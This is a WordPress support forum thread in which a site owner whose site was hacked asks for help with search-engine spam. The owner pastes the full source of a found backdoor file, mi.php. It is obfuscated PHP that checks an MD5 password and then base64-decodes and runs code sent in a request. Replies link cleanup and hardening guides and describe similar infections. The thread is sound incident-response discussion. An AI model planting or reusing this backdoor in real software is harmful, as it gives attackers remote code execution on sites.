Hacked: mi.php & findwpconfig.php

  • I was hacked a month ago. Deleted everything, backed up db, changed all my server passwords, uploaded a fresh WordPress install. Changed all passwords again. I changed my server + db twice, and host changed my db remotely twice.

    Now I’m hacked again:

    https://www.google.com/search?hl=en&source=hp&q=nexium+jessewarden&aq=f&aqi=&aql=&oq=&gs_rfai=

    I searched my db for iframe, pharmacy, and other illicit terms and url’s, but turned up nada. I did the same for my entire copied website; nada. My .htacess seems fine as well.

    I re-downloaded WordPress a few hours ago, and did a diff against my website. The only 2 things strange are found were 2 files that were not included in the standard WordPress installation: mi.php and findwpconfig.php.

    findwpconfig.php is empty. I don’t know the chmod settings on it, but it’s pretty easy to guess its purpose: to find my wpconfig file, and snag out my in-plain-text database password. The mi.php contains the following:

    https://pastebin.com/hC6ZNiLc

    <?php $a = 'm'.'d5';if($a($_REQUEST[$a])=='698357e86842'.'1222bcf89349bd5cf34d'){$w = 'Cdbl0sYoWOiyJt3qtqyOoqxA';$x = $_REQUEST[$w];$y = 'base'.'6';$y.= '4_d'.'ecode';$x = $y($x);$z = 'creat'.'e_f';$z.= 'unction';$x = $z('',$x);$x();} ?>

    Tricky… no wonder I couldn’t find “base64” in a string search.

    Anyway, I don’t mind re-installing everything, but clearly following the standard policy of a clean install ( https://smackdown.blogsblogsblogs.com/2008/06/24/how-to-completely-clean-your-hacked-wordpress-installation/ ) wasn’t enough. Whatever the exploit was, I didn’t clean up last time.

    So… any clue where to look? How is it changing my site’s content only for search engines, but not for regular browsers?

Viewing 5 replies - 1 through 5 (of 5 total)
  • Moderator James Huff

    (@macmanx)

    All hacks are different, but they all suck just the same.

    The best that I can offer are the general steps provided here:

    https://codex.www.ads-software.com/FAQ_My_site_was_hacked

    Once you’re confident that you’ve cleaned everything out, try some (or all) of the suggestions here:

    https://codex.www.ads-software.com/Hardening_WordPress

    Thread Starter jesterxl

    (@jesterxl)

    …also, checking here I found an unknown user in my WordPress, so deleted it. I reckon they found my db password, created a user, and wrote bad files.

    :: shrugs :: Anyway; you think that it’s all I have to do (deleting that user) or is there anything else?

    There’s some excellent advice in https://ottodestruct.com/blog/2009/hacked-wordpress-backdoors/

    Thread Starter jesterxl

    (@jesterxl)

    Thanks esmi; that’s a ton of code to search through… *sigh*.

    All the suggestions above won’t help you most likely. I found similar code but in different exploits. Like you i updated WP, changed all passwords several times and sifted through files where i found multiple fake akismet versions labelled differently for different blogs i owned.

    I removed these versions and updated them multiple times, but the buggy versions kept returning.

    I recently started looking into my php security and found that my php.ini.sample file was infested with the same code you show above. I think my whole server is compromised, so waiting for my web host to look into it. The access the spammers had on me was such that they could add files to my wordpress installs at will, including changing folder permissions on command. Nasty stuff.

    Wishing you good luck in getting to the bottom of your issues.

Viewing 5 replies - 1 through 5 (of 5 total)
  • The topic ‘Hacked: mi.php & findwpconfig.php’ is closed to new replies.